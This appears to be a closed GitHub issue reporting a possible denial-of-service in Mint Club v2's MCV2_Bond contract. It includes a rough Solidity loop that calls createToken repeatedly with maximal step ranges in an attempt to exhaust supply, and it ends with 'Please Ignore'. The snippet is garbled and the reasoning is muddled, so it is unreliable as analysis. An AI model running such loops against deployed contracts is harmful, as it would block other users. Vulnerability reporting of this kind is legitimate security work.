Possibile Dos Preventing CreateToken and createMultiToken
Closed this issue · 1 comments
Users can mint max number of uint128 possible recurrently
mint.club-v2-contract/contracts/MCV2_Bond.sol
Line 246 in 0665adb
BondStep[] memory exampleSteps = new BondStep[](1);
exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });
uint128[] memory price = new uint128[](2); // Adjust the length as needed
price[0] =0;
price[1] = 2;
uint128[] memory range = new uint128[](2); // Adjust the length as needed
range [0] = type(uint128).max;
range [1] = 2;
BondParams memory bondParams = BondParams({
royalty: 1000,
reserveToken: random, // Replace with the actual address
maxSupply: maxSupply,
stepRanges: range, // Step ranges
stepPrices: price // Should have the same length as stepRanges
});
by Leveraging on this condition...
mint.club-v2-contract/contracts/MCV2_Bond.sol
Line 261 in 0665adb
The function above is called multiple times with a malicious contract in a loop Multiple times. With the aim of maxing out Mcv2Token::totalsupply
which is a uint256. To prevent other users from been able to mint nor create a token.. in this format
uint256 totalSupply = testToken.totalSupply();
uint128 newMint = type(uint128).max;
uint256 maxUint = type(uint256).max;
for (uint256 i = 0; i < 10; i++) {
if ((maxUint - totalSupply) < newMint) {
newMint = newMint / 2;
}
BondStep[] memory exampleSteps = new BondStep[](1);
exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });
uint128[] memory price = new uint128[](2); // Adjust the length as needed
price[0] =0;
price[1] = 2;
uint128[] memory range = new uint128[](2); // Adjust the length as needed
range [0] = newMint;
range [1] = 2;
BondParams memory bondParams = BondParams({
royalty: 1000,
reserveToken: random, // Replace with the actual address
maxSupply: maxSupply,
stepRanges: range, // Step ranges
stepPrices: price // Should have the same length as stepRanges
});
MCV2Bond.createToken();
}
Max Uint available for McV2Token is almost completely exhausted. and would prevent other users from creating a new Token. as there would be arithmethic overflow and underflow...
This is also applicable here
mint.club-v2-contract/contracts/MCV2_Bond.sol
Line 274 in 0665adb
mint.club-v2-contract/contracts/MCV2_Bond.sol
Line 290 in 0665adb
Please Ignore